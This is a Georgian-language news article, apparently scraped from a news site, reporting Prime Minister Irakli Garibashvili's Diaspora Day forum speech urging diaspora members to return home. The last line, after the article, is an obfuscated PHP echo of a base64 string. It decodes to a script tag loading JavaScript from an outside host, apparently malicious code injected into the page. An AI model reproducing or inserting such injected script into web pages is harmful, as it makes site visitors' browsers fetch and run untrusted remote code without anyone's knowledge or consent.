celsiusi
ავერსი საქკაბელი
პრემიერ–მინისტრი ირაკლი ღარიბაშვილის განცხადებით, საქართველოს ჰყავს დიასპორის არაერთი წარმატებული და ბრწყინვალე წარმომადგენელი და ახალგაზრდებმა უნდა იცოდნენ მათ შესახებ.
 
ამის შესახებ ღარიბაშვილმა დიასპორის დღისადმი მიძღვნილ ფორუმზე - “ქართული დიასპორა საქართველოს ევროპული მომავლისათვის" სიტყვით გამოსვლისას განაცხადა.
 
„ძალიან ბევრი შეიძლება ვისაუბროთ, ძალიან ბევრი პრობლემა აქვთ ჩვენი დიასპორის წარმომადგენლებს სხვადასხვა მიზეზების გამო. მე ვიცი, რომ ჩვენს მოქალაქეებს მოუწიათ საქართველოს ქვეყნის ფარგლებს გარეთ წასვლა, დროებით დატოვება ჩვენი სამშობლოსი, მაგრამ მე და ჩვენ, ყველამ კარგად ვიცით, რომ თითოეული მათგანის გული არის სამშობლოსთან. წარმოუდგენელია, რომ ქართველ ადამიანს გული არ მიუწევდეს სამშობლოში დაბრუნებისკენ. მე ძალიან კარგად მესმის, რომ ბევრ მათგანს ჯერ კიდევ არ შეუძლია დაბრუნება საქართველოში, მაგრამ მათი მთავარი, საბოლოო მიზანი უნდა იყოს ჩვენს ქვეყანაში დაბრუნება. ჩვენ არაერთი, ათასობით, ასი ათასობით შეიძლება დიასპორის წარმატებული წარმომადგენელი გვყავს საქართველოს ფარგლებს გარეთ. არა მხოლოდ მე-20 საუკუნეში, არამედ უფრო შორეულ წარსულში რომ გადავიხედოთ, ჩვენ გვყავდა ძალიან წარმატებული, ბრწყინვალე წარმომადგენლები ჩვენი დიასპორისა, რომლებიც მართავდნენ და მე რამდენიმე გვარს ალბათ ვერ გამოვყოფდი, ვინაიდან ძალიან ბევრი იყო, ზოგიერთი აშშ-ში, ევროპაში, ახლო აღმოსავლეთში, ჩვენს სამეზობლოში, ყველგან. ისინი ძალიან წარმატებით მოღვაწეობდნენ და ქმნიდნენ ძალიან მნიშვნელოვან საქმეს და იმ ქვეყნებში შექმნეს ძალიან დიდი პროგრესი.
 
ამ ადამიანების გვარები დღეს, სამწუხაროდ, არის დავიწყებული და აუცილებელია ჩვენს ახალგაზრდებს შევახსენოთ, თუ ვისი გორისანი ვართ, თუ როგორ წარმატებით მოღვაწეობენ ქართველები არა მხოლოდ ქვეყნის შიგნით, არამედ მის ფარგლებს გარეთ. ქალბატონი პრეზიდენტი საუბრობდა ინიციატივაზე, იდეაზე, რომელიც უზრუნველყოფს დიასპორის წარმომადგენელების ჩართულობას ქართულ პოლიტიკაში და მინდა, აქვე აღვნიშნო, რომ ქალბატონი პრეზიდენტი, რომელიც არის დიასპორის ბრწყინვალე წარმომადგენელი, საქართველოში დაბრუნდა და ჩვენ ავირჩიეთ პრეზიდენტად რა თქმა უნდა, ესეც არის ძალიან სიმბოლური,“ - აღნიშნა პრემიერმა.
597
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");